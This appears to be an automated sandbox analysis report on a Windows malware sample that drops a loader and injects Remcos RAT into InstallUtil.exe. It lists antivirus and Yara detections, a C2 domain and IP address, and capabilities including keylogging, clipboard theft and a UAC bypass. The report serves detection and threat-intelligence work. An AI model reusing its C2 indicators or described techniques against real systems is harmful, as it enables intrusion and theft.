Source: 19.2.Qerdo.exe.40000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 28.0.InstallUtil.exe.400000.3.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.7.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.7.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.1.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.2.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.6.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 19.0.Qerdo.exe.40000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 28.2.InstallUtil.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.4.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.5.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.6.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 24.2.Qerdo.exe.9a0000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 28.0.InstallUtil.exe.400000.1.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.8.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 24.0.Qerdo.exe.9a0000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 26.0.InstallUtil.exe.400000.5.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.2.InstallUtil.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 0.0.kyFBQxVbsg.exe.2e0000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 17.0.InstallUtil.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.6.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.4.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.2.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.8.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.3.unpack	Avira: Label: BDS/Backdoor.Gen

Source: 26.2.InstallUtil.exe.400000.0.unpack

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00430185 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

17_2_00430185

Source: kyFBQxVbsg.exe, 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Uses 32bit PE files

Source: kyFBQxVbsg.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: kyFBQxVbsg.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: protobuf-net.pdbSHA256 source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00406571 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,GetFileAttributesW,DeleteFileW,Sleep,StrToIntA,CreateDirectoryW,

17_2_00406571

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0040A1C4 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	17_2_0040A1C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0040620E FindFirstFileW,FindNextFileW,	17_2_0040620E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004162EF FindFirstFileW,FindNextFileW,FindNextFileW,	17_2_004162EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0040A3CB FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	17_2_0040A3CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0044A569 FindFirstFileExA,	17_2_0044A569
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004187B1 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	17_2_004187B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00407AC0 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_00407AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00407ED2 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_00407ED2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00406EEF __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	17_2_00406EEF

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: nikahuve.ac.ug

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: DANILENKODE DANILENKODE

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 194.5.98.107 194.5.98.107

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.6:49798 -> 194.5.98.107:6968

Source: InstallUtil.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: kyFBQxVbsg.exe, 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: kyFBQxVbsg.exe, 00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: kyFBQxVbsg.exe, 00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000002.597952189.000000000239C000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000002.610776047.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown

DNS traffic detected: queries for: nikahuve.ac.ug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_0042386F recv,

17_2_0042386F

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Jump to behavior

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00408B9A GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,

17_2_00408B9A

Contains functionality for read data from the clipboard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00409D9C OpenClipboard,GetClipboardData,CloseClipboard,

17_2_00409D9C

Contains functionality to read the clipboard data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00409D9C OpenClipboard,GetClipboardData,CloseClipboard,

17_2_00409D9C

Creates a DirectInput object (often for capturing keystrokes)

Source: Qerdo.exe, 00000013.00000002.597284812.0000000000878000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6304, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.Qerdo.exe.5440000.4.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.Qerdo.exe.48f0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.Qerdo.exe.48f0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
